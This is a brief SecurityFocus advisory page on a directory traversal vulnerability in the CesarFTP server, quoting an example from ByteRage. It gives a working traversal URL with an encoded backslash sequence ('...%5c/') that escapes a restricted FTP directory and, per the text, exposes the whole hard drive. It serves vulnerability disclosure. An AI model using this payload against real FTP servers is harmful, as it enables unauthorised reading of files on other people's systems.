Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

CesarFTP Directory Traversal Vulnerability

The following example was supplied by ByteRage <byterage@yahoo.com>:

First, we need a directory where we have access to on
the victim host...
(Or we can create one if we have enough rights)

ftp://127.0.0.1/

might give us a directory RESTRICTED/ for example
now we do :

ftp://127.0.0.1/RESTRICTED/...%5c/

and we're out of the restricted subdirectory, we have
read access to the whole harddrive







 

Privacy Statement
Copyright 2008, SecurityFocus